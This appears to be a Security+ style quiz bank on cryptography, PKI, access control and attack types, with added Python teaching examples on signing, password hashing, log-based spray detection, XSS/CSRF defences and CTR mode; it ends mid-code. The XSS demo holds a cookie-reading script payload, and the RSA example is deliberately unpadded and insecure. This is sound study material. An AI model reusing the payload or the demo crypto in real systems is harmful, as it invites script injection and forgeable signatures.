• A single key used for both encryption and decryption

Which of the answers listed below describe(s) the characteristics of ECDSA? (Select all that apply)

• Provides authentication, integrity, and non-repudiation

• Based on elliptic curve cryptography

• Designed for data encryption

• Specifically designed for creating and verifying digital signatures

• More computationally efficient than other signature algorithms

• Enables the key exchange process

Given the computational limitations of IoT devices, smartcards, and mobile devices, which of the following
digital signature algorithms would be the most efficient choice due to its smaller key
size and lower processing requirements?

• RSA

• ECDHE

• DSA

• ECDSA

• ECC
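
The signature questions above (DSA, RSA, ECDSA) all reduce to the same two steps: sign = hash the message and transform the hash with the private key; verify = reverse the transformation with the public key and compare against a fresh hash. As an added example, not from the original page, here is textbook RSA signing in Python with two well-known Mersenne primes as a demo key. It is deliberately minimal: no PSS/PKCS#1 padding and publicly known primes, so it illustrates the mechanism only and must never be used for real signatures.

```python
import hashlib

# Demo-only key built from two Mersenne primes (2^127-1 and 2^521-1). Real keys use random
# primes of at least 1024 bits each and a padding scheme; these values are for illustration.
P = (1 << 127) - 1
Q = (1 << 521) - 1
N = P * Q                          # public modulus (~648 bits)
E = 65537                          # public exponent
PHI = (P - 1) * (Q - 1)
D = pow(E, -1, PHI)                # private exponent (Python 3.8+ modular inverse)

def _digest_int(message: bytes) -> int:
    """SHA-256 of the message as a 256-bit integer, well below N so no reduction happens."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big")

def sign(message: bytes, d: int = D, n: int = N) -> int:
    """Signer: only the holder of d can compute this, which gives non-repudiation."""
    return pow(_digest_int(message), d, n)

def verify(message: bytes, signature: int, e: int = E, n: int = N) -> bool:
    """Verifier: anyone with the public (e, n) recovers the hash and compares it."""
    return pow(signature, e, n) == _digest_int(message)

if __name__ == "__main__":
    msg = b"pay 100 EUR to account 42"        # constructed sample message
    sig = sign(msg)
    print(verify(msg, sig))                                   # True
    print(verify(b"pay 900 EUR to account 42", sig))          # False: integrity broken
    print(verify(msg, (sig + 1) % N))                         # False: tampered signature
```

Note the asymmetry the IoT question above is about: RSA needs a ~2048-bit modulus for security comparable to a 256-bit ECDSA key, so the signer does modular exponentiation on numbers eight times longer. That size difference, not the hash step, is what makes ECDSA the better fit for constrained devices.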

Key stretching is a cryptographic technique that enhances the security of sensitive data, such as
cryptographic keys and passwords. It works by repeatedly applying a resource-intensive function or
algorithm to the input data, thus increasing the computational effort required to derive the
original key or password, which makes the data more resistant to brute-force, dictionary, or
rainbow table attacks.

• True

• False

Which of the following is an example of a key stretching algorithm?

• RIPEMD

• SHA

• HMAC

• PBKDF2
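
Added example (not part of the page): salting and key stretching together, as they are used for password storage. The code derives a PBKDF2-HMAC-SHA256 record with a per-password random salt, verifies in constant time, and contrasts it with unsalted MD5 to show why a precomputed (rainbow) table stops working. Standard library only; the record format and iteration count are this example's own choices, not a standard.

```python
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 600_000   # work factor; tune so that one derivation takes ~100 ms on your servers

def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = ITERATIONS) -> str:
    """Salt + stretch, returning a self-describing record: algorithm$iterations$salt_hex$digest_hex."""
    if salt is None:
        salt = os.urandom(16)                      # fresh 128-bit random salt for every password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password: str, record: str) -> bool:
    """Re-derive with the stored salt and iteration count, then compare in constant time."""
    algo, iterations, salt_hex, digest_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    recomputed = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iterations), dklen=32)
    return hmac.compare_digest(recomputed, bytes.fromhex(digest_hex))

def unsalted_md5(password: str) -> str:
    """The legacy scheme rainbow tables target: same password -> same hash everywhere."""
    return hashlib.md5(password.encode()).hexdigest()

def salting_defeats_precomputation(password: str, iterations: int = ITERATIONS) -> bool:
    """Two users with the same password get identical MD5 digests but different salted records,
    so a table precomputed from passwords alone cannot be reused across users or sites."""
    same_md5 = unsalted_md5(password) == unsalted_md5(password)
    rec_a = hash_password(password, iterations=iterations)
    rec_b = hash_password(password, iterations=iterations)
    return (same_md5 and rec_a != rec_b
            and verify_password(password, rec_a) and verify_password(password, rec_b))

if __name__ == "__main__":
    rec = hash_password("correct horse battery staple")      # constructed sample password
    print(rec)
    print(verify_password("correct horse battery staple", rec))   # True
    print(verify_password("Correct horse battery staple", rec))   # False
```

Storing the iteration count in the record is what lets you raise the work factor later: old records keep verifying with their own count and can be re-hashed transparently at the user's next successful login.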

The term "Open public ledger" is used to describe a distributed database stored across multiple
computers in a P2P network.

• True

• False

Blockchain technology is an example of:

• Online payment gateway

• Centralized database

• Open public ledger

• Cloud storage system

Which of the answers listed below refers to a set of standards and specifications that define
various cryptographic techniques, including formats for public keys, private keys, digital
signatures, and digital certificates?

• ITIL

• RFC

• PKCS

• ISO/IEC

Which of the following defines a file format for storing and exchanging personal identity information,
including private keys and digital certificates?

• P10

• P11

• P12

• P13

A type of digital document that verifies the identity of an individual, device, service, or organization in
online communications is known as:

• Encryption key

• Digital certificate

• Identity token

• Digital signature

What is the role of Registration Authority (RA) in PKI? (Select 2 answers)

• Accepting requests for digital certificates

• Validating digital certificates

• Authenticating the entity making the request

• Providing backup source for cryptographic keys

• Issuing digital certificates

Which of the answers listed below refers to a trusted third party responsible for issuing, revoking, and
managing digital certificates?

• RA

• DN

• CA

• CSP

Which of the following answers refers to a means for periodic publication of all digital certificates that
have been revoked?

• CRL

• OSPF

• RA

• CSR

Which of the answers listed below refers to a protocol that enables on-demand querying of the revocation
status of a digital certificate?

• CSP

• OCSP

• DN

• CRL

What is the fastest way to check the validity of a single digital certificate?

• CSR

• DN

• CRL

• OCSP

Which of the following answers refer(s) to the Mandatory Access Control (MAC) model? (Select all that
apply)

• Users are not allowed to change access policies at their own discretion

• Labels and clearance levels can only be applied and changed by an administrator

• Every object has an owner who at his/her own discretion determines what kind of
permissions other users can have to that object

• Access to resources based on user identity

• Every resource has a sensitivity label matching a clearance level assigned to a user

Discretionary Access Control (DAC) is an access control model based on user identity. In DAC, every
object has an owner who at his/her own discretion determines what kind of permissions other users
can have for that object.

• True

• False

Which type of access control model ties user permissions to their specific job responsibilities?

• DAC

• RBAC

• MAC

• ABAC

Which access control model allows for defining granular rules that consider user roles, time constraints,
and network access restrictions?

• ABAC

• MAC

• RuBAC

• DAC

• RBAC

Examples of properties used for defining access policies in Attribute-Based Access Control (ABAC)
model include:

• Subject (i.e., user or process requesting access)

• Type of action (for example "read", "write", "execute")

• Resource type (medical record, bank account etc.)

• Environment (contextual data, such as time of day or geolocation)

• All of the above

Which access control model defines access control rules with the use of statements that closely
resemble natural language?

• DAC

• ABAC

• MAC

• RBAC

Which of the access control models listed below enforces the strictest set of access rules?

• MAC

• RBAC

• DAC

• ABAC

Which of the following access control methods would be the most suitable for scheduling system
maintenance tasks during periods of low user activity?

• Resource provisioning

• Time-of-day restrictions

• Principle of least privilege

• Just-in-time permissions
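
Added example (not from the original document): a small Python policy engine covering MAC (labels and clearances compared by level, with no read-up and no write-down), ABAC (rules over subject, action, resource and environment attributes) and a time-of-day restriction of the kind a rule-based model expresses. The roles, labels and policy rules are constructed for illustration.

```python
from dataclasses import dataclass
from datetime import time

LEVELS = {"public": 0, "confidential": 1, "secret": 2, "top_secret": 3}

def mac_allows(action: str, subject_clearance: str, object_label: str) -> bool:
    """Mandatory access control, Bell-LaPadula style: no read up, no write down.
    Labels are fixed by an administrator; neither users nor owners can relabel."""
    s, o = LEVELS[subject_clearance], LEVELS[object_label]
    if action == "read":
        return s >= o          # may read at or below own clearance
    if action == "write":
        return s <= o          # may write at or above own clearance (no leaking downward)
    return False

@dataclass
class Request:
    subject: dict       # who is asking, e.g. {"user": "alice", "role": "nurse", "dept": "cardiology"}
    action: str         # "read" | "write" | "execute"
    resource: dict      # what is asked for, e.g. {"type": "medical_record", "dept": "cardiology"}
    environment: dict   # context, e.g. {"time": time(14, 0), "network": "internal"}

# ABAC policy: each rule is a predicate over the four attribute sets; the first match grants
ABAC_RULES = [
    # doctors may do anything with medical records
    lambda r: r.subject.get("role") == "doctor" and r.resource.get("type") == "medical_record",
    # nurses may read records, but only within their own department
    lambda r: r.subject.get("role") == "nurse" and r.action == "read"
              and r.resource.get("type") == "medical_record"
              and r.subject.get("dept") == r.resource.get("dept"),
    # time-of-day restriction: the maintenance account runs jobs only in the 02:00-04:00
    # low-activity window, and only from the internal network
    lambda r: r.subject.get("role") == "maintenance" and r.action == "execute"
              and time(2, 0) <= r.environment.get("time", time(0, 0)) < time(4, 0)
              and r.environment.get("network") == "internal",
]

def abac_allows(request: Request) -> bool:
    """Default deny: access is granted only if some rule explicitly matches."""
    return any(rule(request) for rule in ABAC_RULES)

if __name__ == "__main__":
    print(mac_allows("read", "secret", "confidential"))     # True
    print(mac_allows("write", "secret", "confidential"))    # False (write down)
    night_job = Request({"role": "maintenance"}, "execute", {"type": "host"},
                        {"time": time(3, 0), "network": "internal"})
    print(abac_allows(night_job))                           # True
```

The contrast with DAC is in who can change the decision inputs: in mac_allows() only an administrator edits LEVELS and the labels, whereas a DAC owner would set an ACL on the object directly.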

The principle of least privilege is a security rule that prevents users from accessing information and
resources that lie beyond the scope of their responsibilities.

• True

• False

The two factors that are considered important for creating strong passwords are: (Select 2
answers)

• Password length

• Minimum password age

• Password history

• Password complexity

• Maximum password age

A strong password that meets the password complexity requirement should contain: (Select the best
answer)

• Uppercase letters (A-Z)

• Digits (0-9)

• Non-alphanumeric characters if permitted (e.g., !, @, #, $)

• Lowercase letters (a-z)

• A combination of characters from at least 3 character groups

Which of the following passwords is the most complex?

• T$7C52WL4SU

• GdL3tU8wxYz

• @TxBL$nW@Xt

• G$L3tU8wY@z

Which password policy would be the most effective in decreasing the risk of a security breach across
multiple accounts?

• Password expiration policy

• Minimum password age policy

• Password reuse policy

• Maximum password age policy

Which password policy enforces a mandatory password change after a specific time?

• Password expiration policy

• Password history policy

• Minimum password age policy

• Password reuse policy

The minimum password age policy setting determines the period of time that a password can be used
before the system requires the user to change it.

• True

• False

The maximum password age policy setting determines the period of time that a password must be used
before the user can change it.

• True

• False

Which of the answers listed below refers to a software tool specifically designed to store and manage
login credentials?

• BitLocker

• Password manager

• Key escrow

• Password vault

Which of the following technologies cannot be used as a passwordless authentication method?

• Biometrics

• Hardware tokens

• QR codes

• OTPs

• Passkeys

• All of the above can be used as a means for passwordless authentication

Replacing password characters in a password field with a series of asterisks is an example of:

• Data masking

• Tokenization

• Anonymization

• Pseudo-anonymization

The importance of changing default usernames and passwords can be illustrated by the example of
certain network devices (such as routers), which are often shipped with default and well-known admin
credentials that can be looked up on the web.

• True

• False

A technique that allows an attacker to authenticate to a remote server using a captured password hash
directly, without first recovering the cleartext password from it, is known as:

• Pass the hash

• Replay attack

• Brute-force attack

• Spraying attack

A short list of commonly used passwords tried against a large number of user accounts is a characteristic
feature of:

• Replay attack

• Dictionary attack

• Spraying attack

• Birthday attack

Which password attack bypasses account-lockout policies?

• Birthday attack

• Replay attack

• Spraying attack

• Dictionary attack

An attack against encrypted data that relies heavily on computing power to check all possible keys
and passwords until the correct one is found is called:

• Replay attack

• Brute-force attack

• Dictionary attack

• Birthday attack

One of the measures for bypassing the failed logon attempt account lockout policy is to capture any
relevant data that might contain the password and brute force it offline.

• True

• False
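
Spraying and brute force leave different fingerprints in authentication logs, which is what a lockout policy and its detection logic have to key on. As an added example, not from the page, this Python classifies each source address in a constructed sample log: many distinct users with one or two failures each is spraying (designed to stay under the lockout threshold), many failures against a single user is brute force. The log format, thresholds and IP addresses are invented for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample authentication log (syslog-like); not from a real system.
SAMPLE_LOG = """\
2024-05-01T09:00:01 auth FAILED user=alice src=203.0.113.9
2024-05-01T09:00:02 auth FAILED user=bob src=203.0.113.9
2024-05-01T09:00:03 auth FAILED user=carol src=203.0.113.9
2024-05-01T09:00:04 auth FAILED user=dave src=203.0.113.9
2024-05-01T09:00:05 auth FAILED user=erin src=203.0.113.9
2024-05-01T09:00:06 auth FAILED user=frank src=203.0.113.9
2024-05-01T09:00:07 auth FAILED user=alice src=198.51.100.7
2024-05-01T09:00:08 auth FAILED user=alice src=198.51.100.7
2024-05-01T09:00:09 auth FAILED user=alice src=198.51.100.7
2024-05-01T09:00:10 auth FAILED user=alice src=198.51.100.7
2024-05-01T09:00:11 auth FAILED user=alice src=198.51.100.7
2024-05-01T09:00:12 auth FAILED user=alice src=198.51.100.7
2024-05-01T09:00:13 auth FAILED user=bob src=192.0.2.5
2024-05-01T09:00:14 auth OK user=bob src=192.0.2.5
"""

LINE = re.compile(r"^(?P<ts>\S+) auth (?P<result>FAILED|OK) user=(?P<user>\S+) src=(?P<src>\S+)$")

def parse(log: str):
    """Yield (timestamp, result, user, source) for every well-formed line; skip the rest."""
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            yield datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["src"]

def classify_sources(log: str, window: timedelta = timedelta(minutes=10),
                     spray_users: int = 5, brute_attempts: int = 5) -> dict:
    """Per source IP, look at failures inside a sliding window ending at the last failure:
    - >= spray_users distinct accounts, each below the lockout threshold -> password spraying
    - any single account at or above brute_attempts                     -> brute force
    - otherwise                                                         -> benign
    A per-account lockout policy (brute_attempts) never fires on the spraying pattern,
    which is why detection has to aggregate by source as well."""
    events = list(parse(log))
    verdicts = {}
    for src in {e[3] for e in events}:
        fails = [e for e in events if e[3] == src and e[1] == "FAILED"]
        if not fails:
            continue
        end = max(e[0] for e in fails)
        recent = [e for e in fails if end - e[0] <= window]
        per_user = defaultdict(int)
        for e in recent:
            per_user[e[2]] += 1
        if max(per_user.values()) >= brute_attempts:
            verdicts[src] = "brute_force"
        elif len(per_user) >= spray_users:
            verdicts[src] = "password_spraying"
        else:
            verdicts[src] = "benign"
    return verdicts

if __name__ == "__main__":
    for src, verdict in sorted(classify_sources(SAMPLE_LOG).items()):
        print(src, verdict)
```

In production the same aggregation runs over the SIEM's failed-logon events with the window sized to the lockout observation window; the offline-cracking bypass described in the true/false item above produces no failed logons at all, which is why it is countered by hash strength (salting and stretching) rather than by lockout.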

Which part of the incident response process involves establishing and maintaining the incident response
capability as well as setting up an incident response team?

• Preparation

• Detection and analysis

• Containment, eradication, and recovery

• Post-incident activity

In the incident response process, the step that involves identifying and understanding potential incidents to
determine their scope, impact, and root cause is a part of the:

• Preparation stage

• Detection and analysis stage

• Containment, eradication, and recovery stage

• Post-incident activity stage

Which of the following answers refer(s) to the containment, eradication, and recovery stage of the incident
response process? (Select all that apply)

• Restoring normal operations

• Eliminating the threat

• Monitoring and detecting potential incidents

• Establishing and maintaining an incident response policy

• Mitigating the impact of the incident


Which stage of the incident response process involves updating incident response plans, policies,
and procedures?

• Preparation

• Detection and analysis

• Containment, eradication, and recovery

• Post-incident activity

Which of the answers listed below refers to a discussion-based activity where team members walk
through different scenarios to evaluate the incident response plan without activating any systems?

• Tabletop exercise

• Simulation

• Threat hunting

• Root cause analysis

Which of the following answers refers to a more in-depth exercise, which can include activating
systems and performing real actions to respond to the incident?

• Penetration testing

• Threat hunting

• Simulation

• Vulnerability scanning

Which step of the post-incident activity stage involves analyzing logs, forensic data, and other evidence
to establish why the incident happened and prevent its recurrence?

• Reporting

• E-discovery

• Root cause analysis

• Threat hunting

The term "Threat hunting" refers to a proactive search for indicators of compromise (IoCs) to identify and
address potential threats and vulnerabilities before they can escalate into full-blown incidents.

• True

• False

The process of maintaining a documented record of the handling and movement of evidence to
ensure its integrity and admissibility in court is called:

• Chain of custody

• Chain of evidence

• Chain of accountability

• Chain of responsibility

The process of identifying, collecting, and producing electronically stored information with the intent of
using it in a legal proceeding or investigation is referred to as:

• Litigation hold

• Evidence management

• Digital forensics

• E-discovery

Which of the protocols listed below is used to enable secure web browsing?

• L2TP

• HTTPS

• SSH

• IPsec

Which of the following protocols allow(s) for secure file transfer? (Select all that apply)

• FTPS

• TFTP

• FTP

• SFTP

FTPS is an extension to the SSH protocol and runs by default on TCP port 22.

• True

• False

Which of the answers listed below refers to a secure replacement for Telnet?

• RSH

• IPsec

• SSH

• RTPS

Which of the following answers refers to a protocol designed as a secure way to send emails from a
client to a mail server and between mail servers (long listed as deprecated in favor of STARTTLS, although
RFC 8314 now recommends its implicit-TLS port 465 for message submission)?

• IMAPS

• SFTP

• POP3S

• SMTPS

Which of the protocols listed below enable secure retrieval of emails from a mail server to an email
client? (Select 2 answers)

• FTPS

• IMAPS

• POP3S

• STARTTLS

• SMTPS

Which of the following protocols enables secure access and management of emails on a mail server
from an email client?

• POP3S

• SMTPS

• IMAPS

• S/MIME

Which of the answers listed below refers to a secure network protocol used to provide encryption,
authentication, and integrity for real-time multimedia communication?

• IPsec

• SIP

• VoIP

• SRTP

Which of the answers listed below refer to DSA? (Select 2 answers)

• Specifically designed for creating and verifying digital signatures

• Primarily used for secure communication and digital signatures

• Not well suited for data encryption (DSA is not an encryption algorithm)

• Used for both encryption and digital signatures in various applications

• Based on the mathematical properties of large prime numbers

Which of the following answers refer to the characteristic features of RSA? (Select 2 answers)

• Based on the discrete logarithm problem

• Primarily used for secure communication and digital signatures

• Used for data encryption

• Specifically designed for creating and verifying digital signatures

• Not well suited for data encryption

Which of the answers listed below best describe the characteristics of ECDSA? (Select 2 answers)

• Used for digital signatures

• Can be used for both encryption and digital signatures

• Does not include a native encryption function

• Enables the encryption of data

• Based on the mathematical properties of large prime numbers

A hash function is a mathematical algorithm that maps data of arbitrary size to a fixed-size hash value,
typically represented as a short string of hexadecimal characters. The result, also known as a digest or
checksum, acts as a practically unique fingerprint of the input (collisions must exist for a fixed-size
output, but a secure hash makes them computationally infeasible to find). Hash functions are designed so
that any change to the data after the original hash was generated, even a single bit, produces a
completely different digest, which is what makes them useful for detecting modification.

• True

• False

Hash functions find use in a variety of applications, including:

• Cryptography

• Data integrity verification

• Password verification and storage

• Digital signatures

• Blockchain technology

• All of the above

Which of the answers listed below refers to a cryptographic hash function that has been widely used in
the past but is now considered deprecated for security-sensitive applications due to known
vulnerabilities?

• MD5

• SHA

• CRC

• HMAC

Which of the following answers can be used to describe self-signed digital certificates? (Select 3 answers)

• Backed by a well-known and trusted third party

• Not trusted by default by web browsers and other applications

• Used in trusted environments, such as internal networks and development environments

• Suitable for websites and other applications that are accessible to the public

• Trusted by default by web browsers and other applications

• Not backed by a well-known and trusted third party

A self-signed digital certificate is also referred to as:

• Client certificate

• EV certificate

• Server certificate

• Wildcard certificate

• None of the above

Third-party digital certificates, issued by trusted CAs, are automatically trusted by most browsers and
operating systems, usually involve a cost, and require validation of the applicant's identity. In contrast, self-
signed certificates, issued by the entity to itself, are not automatically trusted, are free to create and
use, and do not require validation by a CA.

• True

• False

In the context of digital certificates, the term "Root of trust" refers to the highest level of trust within a
PKI system. It is typically represented by a root CA, which is a trusted third party that serves as the
foundation for the entire PKI. All other entities in the PKI hierarchy, including
intermediate CAs and end-entities (such as web servers, email servers, user devices, IoT devices, and
individual users), derive their trust from this root. When a certificate is issued and signed by
an intermediate CA, it gains trust through a chain of trust back to the root CA. This hierarchical trust
model allows users and systems to trust certificates presented by websites, services, or individuals
because they can trace the trust back to the well-established root of trust.

• True

• False

Which of the answers listed below refers to a PKI trust model?

• Single CA model

• Hierarchical model (root CA + intermediate CAs)

• Mesh model (cross-certifying CAs)

• Web of trust model (no central CA; participants sign one another's keys, as in PGP)

• Chain of trust model (multiple CAs in a sequential chain)

• Bridge model (cross-certifying between separate PKIs)

• Hybrid model (combining aspects of different models)

• All of the above

Which of the following answers refers to a cryptographic file generated by an entity requesting a digital
certificate from a CA?

• OID

• CSR

• DN

• CRL

A type of digital certificate that can be used to secure multiple subdomains within a primary domain is
known as:

• Root signing certificate

• Subject Alternative Name (SAN) certificate

• Extended Validation (EV) certificate

• Wildcard certificate

Which digital certificate type allows to secure multiple domain names or subdomains with a single
certificate?

• Extended Validation (EV) certificate

• Wildcard certificate

• Subject Alternative Name (SAN) certificate

• Root signing certificate


Which of the answers listed below refers to an identifier used for PKI objects?

• OID

• DN

• SAN

• GUID

In IT security, the term "Shadow IT" is used to describe the practice of using IT systems, software, or
services within an organization without the explicit approval or oversight of the organization's IT
department.

• True

• False

Which of the following terms is used to describe sophisticated and prolonged cyberattacks often
carried out by well-funded and organized groups, such as nation-states?

• MitM

• APT

• XSRF

• DDoS

An attack surface is the sum of all the points (exposed interfaces, services, accounts, and code paths)
through which an attacker can interact with or attempt to compromise a system or network; it measures
overall exposure whether or not each point currently has a known flaw. Examples include every reachable
software, hardware, and network interface. A threat vector is the method or means through which a
threat is introduced or delivered to a target system; it describes the pathway attackers use to reach and
exploit vulnerabilities. Common threat vector types include phishing emails, malware, drive-by
downloads, and social engineering techniques.

• True

• False

Which of the answers listed below refers to an email-based threat vector?

• Spoofing

• Phishing

• BEC attacks

• Malicious links

• Malware attachments

• All of the above

Which of the following terms refers to a threat vector commonly associated with SMS-based
communication?

• Phishing

• Vishing

• Smishing

• Pharming

Which of the answers listed below refers to an example of a potential threat vector in IM-based
communication?

• Phishing attack

• Malware distribution

• Spoofing attack

• Eavesdropping

• Account hijacking

• Malicious link/attachment

• All of the above

Which of the following answers refer to examples of image-based threat vectors? (Select 3 answers)

• Steganography

• BEC attacks

• Image spoofing (deepfakes)

• Brand impersonation

• Malware-embedded images

Which of the answers listed below refers to a file-based threat vector?

• PDF exploits

• Malicious macros in documents

• Compressed files (ZIP, RAR)

• Malicious scripts in web pages

• Infected images

• Malicious executables

• All of the above

Which of the following answer choices is an example of a threat vector type that is typical for voice
communication?

• Smishing

• Pharming

• Vishing

• Phishing

Examples of threat vectors directly related to the use of removable devices include: (Select 2
answers)

• Pretexting

• Malware delivery

• Watering hole attacks

• Data exfiltration

• Social engineering attacks

Which of the answers listed below refers to a mobile device's built-in functionality enabling the usage
of locator applications?

• WPS

• GSM

• SIM

• GPS

Which of the following answers refers to a unique 48-bit address assigned to every network adapter?

• PIN

• SSID

• IP

• MAC

In older, non-UEFI based PCs, the first sector of a storage drive containing information about partitions
and a piece of executable code used to load the installed OS is called:

• MBR

• GPT

• PXE

• GUID

In cloud computing, users on an on-premises network take advantage of a transit gateway to connect
to:

• WAN

• VPC

• SAN

• VLAN

Which of the following acronyms refer to office equipment that combines the functionality of multiple
devices? (Select 2 answers)

• MFD

• IoT

• MFP

• PED

• MFA

Which of the following answers refers to a deprecated stream cipher used in some legacy applications,
such as WEP?

• RSA

• DES

• SSL

• RC4

Which of the answers listed below refers to a wireless network authentication protocol that enhances
security by encapsulating the authentication process within an encrypted TLS tunnel?

• PEAP

• EAP

• LEAP

• RADIUS

A type of metric used to evaluate the profitability of an investment by comparing the return generated
from the investment relative to its cost is referred to as:

• ROA

• ROI

• ROS

• ROC

Which of the following facilitates the enforcement of mobile device policies and procedures?

• MFA

• MMC

• MDM

• MFD

Which of the answers listed below refers to an identifier used for objects in a PKI, such as CAs, digital
certificates, and public key algorithms?

• OID

• DN

• SAN

• GUID

Which of the following answers refers to a solution designed to strengthen the security of session
keys?

• ECB

• PFS

• EFS

• PFX

Which of the answers listed below refers to a twisted-pair copper cabling type not surrounded by any
shielding that would provide protection against interference from outside sources?

• STP

• Coax

• UTP

• Twinax

Which of the following terms refers to a technology that enables real-time audio and video
communication between individuals or groups?

• VPC

• VTC

• VoIP

• VDI

A dedicated data storage solution that combines multiple disk drive components into a single logical
unit to increase volume size, performance, or reliability is known as:

• SAN

• RAID

• NAS

• JBOD

Which of the answers listed below can be used to describe XSRF? (Select 3 answers)

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

Which of the following answers can be used to describe the characteristics of an XSS attack? (Select 3
answers)

• Exploits the trust a user's web browser has in a website

• A malicious script is injected into a trusted website

• User's browser executes attacker's script

• Exploits the trust a website has in the user's web browser

• A user is tricked by an attacker into submitting unauthorized web requests

• Website executes attacker's requests
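
Added example (not part of the original page): the two trust relationships from the XSRF and XSS items side by side, in Python. For XSS the fix is output encoding, so the browser renders attacker-supplied input as text rather than markup; for XSRF the server must demand a token the attacker's site cannot read, because the browser attaches the session cookie to cross-site requests automatically. The secret key, session ids and form fields are constructed demo values.

```python
import hashlib
import hmac
import html

SECRET = b"server-side-secret-demo"   # constructed demo key; in practice from config or a KMS

# --- XSS: the browser trusts whatever the site sends ------------------------------
def render_comment_unsafe(comment: str) -> str:
    """Stored XSS: attacker text is concatenated into the page and executes in every visitor's browser."""
    return f"<p>{comment}</p>"

def render_comment_safe(comment: str) -> str:
    """Output encoding: <, >, &, quotes become entities, so the browser shows text, not a script."""
    return f"<p>{html.escape(comment)}</p>"

# --- XSRF: the site trusts whatever the browser sends -----------------------------
def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session with an HMAC; embedded in the form the legitimate page serves.
    A cross-site attacker can make the browser send the cookie, but cannot read this token."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def handle_transfer(session_id: str, form: dict) -> str:
    """A state-changing POST. session_id stands in for the cookie the browser sends automatically."""
    token = form.get("csrf_token", "")
    if not hmac.compare_digest(token, issue_csrf_token(session_id)):
        return "403 rejected: missing or wrong CSRF token"
    return f"200 transferred {form['amount']} to {form['to']}"

if __name__ == "__main__":
    payload = "<script>alert(document.cookie)</script>"        # constructed attacker input
    print(render_comment_unsafe(payload))
    print(render_comment_safe(payload))
    # forged cross-site request: cookie present, token absent
    print(handle_transfer("sess-1", {"amount": "100", "to": "mallory"}))
    # legitimate request from the real page, which carried the token
    print(handle_transfer("sess-1", {"amount": "100", "to": "bob",
                                     "csrf_token": issue_csrf_token("sess-1")}))
```

The two defenses are independent: a site that escapes output is still XSRF-able without the token check, and a site with tokens is still XSS-able if it reflects input raw (and an XSS bug can read the token, which is why fixing XSS comes first).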

Which of the answers listed below refers to an encoding method (and a file format) for storing
cryptographic objects such as X.509 certificates, CRLs, and private keys?

• ECB

• PEM

• FIM

• PFS

Which of the following answers refers to a centralized server that is used to distribute cryptographic
keys and authenticate users and services within a computer network?

• PKI

• RAS

• KDC

• NAS

The AI capability that lets a system learn to accomplish tasks from training data rather than from explicit,
hand-written instructions is called:

• AGI

• ML

• NN

• LLM

Which data packet type is specifically used to detect and prevent network loops in Ethernet networks?

• MTU

• Jumbo frame

• BPDU

• Magic packet

Which of the answers listed below refers to a key exchange protocol that generates temporary (ephemeral)
keys for each session, providing forward secrecy so that a later compromise of the long-term key does not
expose previously recorded sessions?

• PFS

• SHA

• PGP

• DHE

Which of the following terms refers to a method for managing infrastructure resources through scripts
and templates?

• IaaS

• ML

• IaC

• SDN

Which of the answers listed below refer to the characteristic features of NIDS? (Select 3 answers)

• Takes proactive measures to block or mitigate intrusion attempts

• Does not take direct action to block or prevent attacks

• Generates alerts and notifies security personnel or administrators when suspicious activity is
detected

• Monitors network traffic without direct involvement in traffic routing or packet modification

• Can drop or reject network packets, terminate connections, or take other actions to stop the
attack

• Operates in an inline mode, actively intercepting and inspecting network traffic

Which of the following answers refers to a cybersecurity framework that combines network and
security functions into a single cloud-based service?

• SASE

• SIEM

• SWG

• SOAR

A process used by organizations to assess and evaluate the potential impact of disruptive incidents or
disasters on their critical business functions and operations is referred to as:

• BPA

• BIA

• SLE

• BCP

Which of the answers listed below refers to one of the last stages in SDLC?

• UCD

• QA

• UAT

• AUT

Which cipher mode transforms a block cipher into a stream cipher enabling the encryption of individual
bits or bytes of data?

• CFB

• CBC

• GCM

• ECB

Rewriting the destination IP address of incoming data packets, commonly utilized to reroute traffic to
alternative locations or ports is a characteristic feature of:

• IDS

• DNAT

• QoS

• VPN

Which of the following answers refers to a deprecated encryption protocol?

• SSH

• SHA-256

• S/MIME

• SSL

A collection of precompiled functions designed to be used by more than one Microsoft Windows
application simultaneously to save system resources is known as:

• DLL

• API

• INI

• EXE

Which of the terms listed below refers to a documented plan outlining the steps that should be taken in
each phase of a cybersecurity incident?

• DRP

• IRP

• BCP

• ERP

A block cipher mode that encrypts a unique counter value (combined with a nonce) under the encryption key
to generate a stream of pseudorandom blocks, which are then XORed with the plaintext, is called:

• CBC

• GCM

• CFB

• CTM
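
Added example (not from the original document): CTR mode built in Python over a keyed PRF (HMAC-SHA256 stands in for AES block encryption, since the standard library has no AES) to show the mechanism the question describes: the nonce and a counter are fed through the keyed function to produce keystream blocks, which are XORed with the data, so encryption and decryption are the same operation and the block cipher behaves as a stream cipher. It also shows the failure mode a practitioner has to know: reusing a nonce under the same key leaks the XOR of the two plaintexts. The key, nonce and messages are constructed sample values.

```python
import hashlib
import hmac
import os

def block_fn(key: bytes, nonce: bytes, counter: int) -> bytes:
    """Stand-in for AES_k(nonce || counter): a keyed PRF with a 32-byte output."""
    return hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()

def ctr_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter 0, 1, 2, ... each yields one fresh keystream block; take as many bytes as needed."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += block_fn(key, nonce, counter)
        counter += 1
    return bytes(out[:length])

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """CTR encryption and decryption are identical: XOR the data with the keystream.
    Works on any length, including single bytes, without padding."""
    return xor(data, ctr_keystream(key, nonce, len(data)))

def nonce_reuse_leak(key: bytes, nonce: bytes, p1: bytes, p2: bytes) -> bytes:
    """Same key and nonce for two messages: C1 xor C2 == P1 xor P2, the keystream cancels out.
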